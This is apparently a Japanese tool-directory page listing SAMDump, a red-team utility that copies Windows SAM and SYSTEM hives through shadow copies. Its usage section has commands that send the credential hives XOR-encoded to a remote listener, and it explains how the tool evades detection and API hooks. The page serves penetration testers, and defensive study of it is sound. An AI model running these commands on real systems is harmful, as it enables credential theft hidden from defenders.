Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
SAMDump — SAM と SYSTEM ハイブを Volume Shadow Copy (VSS) API を使用して抽出します。外部送信と XOR 難読化オプション付き。C#、C++、Crystal、Python、Rust、Golang、Nim、Deno (Javascript) に対応。 | Kitploit
ツール/GitHubGitHub/ricardojoserf/samdump
特権昇格暗号化/復号化ツールデータ流出ポストエクスプロイトユーティリティとフレームワークレッドチーミング
GitHubricardojoserf/samdump

SAMDump

SAM と SYSTEM ハイブを Volume Shadow Copy (VSS) API を使用して抽出します。外部送信と XOR 難読化オプション付き。C#、C++、Crystal、Python、Rust、Golang、Nim、Deno (Javascript) に対応。

リポジトリを見る
37246410日前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

SAMDump

ボリュームシャドウコピーサービス (VSS) を使用してWindowsのSAMおよびSYSTEMファイルを抽出し、複数の流出オプションとXOR難読化を提供するツール:

  • VSSを使用してボリュームシャドウコピーを一覧表示し、必要に応じて作成する
  • シャドウコピーからSAMおよびSYSTEMファイルを抽出する
  • ファイル操作にNT APIコールを使用 (NtCreateFile, NtReadFile, NtWriteFile)
  • XORエンコードによる難読化をサポート
  • 流出方法: ローカル保存 または ネットワーク転送

C++、C#、Crystal、Pythonで実装されており、最新のWindowsバージョンで動作します。

昇格された権限が必要であり、作成されたシャドウコピーは約5分後に自動的に削除されます。


使用方法

root@kitploit:~
SAMDump.exe [OPTIONS]

Options:
  --save-local [BOOL]    Save locally (default: false)
  --output-dir DIR       Output directory (default: C:\Windows\tasks)
  --send-remote [BOOL]   Send remotely (default: false)
  --host IP              Host for remote sending (default: 127.0.0.1)
  --port PORT            Port for remote sending (default: 7777)
  --xor-encode [BOOL]    XOR Encode (default: false)
  --xor-key KEY          Enable XOR with specified key (default: SAMDump2025)
  --disk DISK            Disk for shadow copy (default: C:\)
  --help                 Show this help

エンコードなしでローカル保存:

root@kitploit:~
SAMDump.exe --save-local --output-dir "C:\temp"

img1

XORエンコードでローカル保存:

root@kitploit:~
SAMDump.exe --save-local --xor-encode --xor-key "SAMDump2025"

img2

XORエンコードとデフォルトキーを使用してリモートサーバーに送信:

root@kitploit:~
SAMDump.exe --send-remote --host 192.168.1.72 --port 1234 --xor-encode

img3


ファイルを受信するサーバー

server.py は、自動XORデコードとファイル名フォーマット機能を備えた、ネットワーク経由でファイルを受信するPythonサーバーです:

root@kitploit:~
python server.py [OPTIONS]

Options:
  --host HOST     IP address to listen on (default: 0.0.0.0)
  --port PORT     Port to listen on (default: 7777)
  --xor-key KEY   Key for XOR decoding (optional)

特定のインターフェースとポートでXORキーを使用してリスナーを起動:

root@kitploit:~
python server.py --host 192.168.1.72 --port 1234 --xor-key "SAMDump2025"

img4

ファイル名にはIPアドレスと日付が含まれるため、異なるシステムからファイルを送信し、プロセスを自動化できます。


ファイルをデコードするスクリプト

xor-decoder.py は、XORエンコードされたSAMおよびSYSTEMファイルをローカルでデコードするPythonスクリプトです:

root@kitploit:~
python xor-decoder.py [OPTIONS]

Options:
  --sam SAM         Path to encoded SAM file (required)
  --system SYSTEM   Path to encoded SYSTEM file (required)
  --xor-key KEY     XOR key for decoding (default: SAMDump2025)
  --output-dir DIR  Output directory for decoded files (default: ./decoded)

デフォルトキーでデコード:

root@kitploit:~
python xor-decoder.py --sam sam.txt --system system.txt

img5

カスタムキーと出力ディレクトリでデコード:

root@kitploit:~
python xor-decoder.py --sam sam.txt --system system.txt --xor-key "MyKey" --output-dir ./results

img6


実装

このプロジェクトには、3つの言語で実装されたバージョンが含まれています:

  • C++: 初期実装
  • C#: 移植性を高めた.NET版
  • Python: comtypes ライブラリのインストールが必要です (pip install comtypes)

動機

このプロセスを自動化したいと考えましたが、私が扱うWindowsのほとんどはVSSを実行しています。ただし、セキュリティソリューションは、シャドウコピーの作成とこれらのファイルの抽出に vssadmin を使用することを検知します。なぜなら、これはよく知られた手法だからです。

このツールは、リモート転送モードを使用する場合、ターゲットファイルシステムに書き込まずにファイルを抽出します。また、XORエンコードは、署名ベースの検出を回避するための基本的な難読化を提供します(リモートモードでも同様です)。

さらに、NT APIコールを活用して、一部の監視やユーザーモードAPIフックをバイパスします。


NT API統合

このツールは、標準のWindows API関数ではなくNTシステムコールを使用しており、一般的に監視されるユーザーモードAPIフックの一部をバイパスできる可能性があります:

  • NtCreateFile および NtReadFile: シャドウコピー内のSAMおよびSYSTEMファイルへのハンドルを開き、そのバイトを読み取るために使用
  • NtWriteFile: ファイルをローカルに保存するために使用

謝辞

@vx-underground に感謝します。エクスポートアドレステーブル (EAT) トラバーサルコードの最適化を特定し提案してくれました。不必要な NtReadVirtualMemory コールを直接ポインタアクセスに置き換えました。

ツールをダウンロード